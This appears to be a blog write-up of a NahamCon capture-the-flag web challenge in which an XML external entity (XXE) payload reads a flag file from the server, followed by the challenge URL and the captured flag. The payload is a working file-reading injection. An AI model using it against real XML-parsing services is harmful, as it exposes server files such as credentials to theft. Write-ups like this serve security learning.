Ulli Weichert/ Mai 3, 2022/ IT-Security, Write-Ups/ 0Kommentare

EXtravagant

I've been working on a XML parsing service. It's not finished but there should be enough for you to try out.

The flag is in /var/www

Press the Start button on the top-right to begin this challenge.

Solving

To solve this one, we need to upload our own malformed XML document (XML external entity (XXE) injection). Create a XML file similar this one, to read the flag content in /var/www/.

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///var/www/flag.txt'>]>
<root>&read;</root>

Upload this file and read the content of it via the View XML function in the webapp.

http://challenge.nahamcon.com:31161/XML?file=text.xml

There it is, our sweet nice flag.

flag{639b72f2dd0017f454c44c3863c4e195}

Further links

Share this Post

Über Ulli Weichert

2004 fing Ulli bei der Bundeswehr als Ausbilder und IT-Spezialist an. 2011 hat Ulli eine Umschulung zum Fachinformatiker für Systemintegration absolviert und sich auf Linux spezialisiert. 2016 hat Ulli dann bei einem mittelständischem Unternehmen, welches Kunden in ganz Deutschland betreut, als Linuxadministrator angefangen und kümmert sich seither nebst, Netzwerk, Security, Firewall, Storage überwiegend um Linuxthemen aller Art. Seit kurzem hat auch Ihn das Thema Container und k8s erwischt.

Hinterlasse einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert

*
*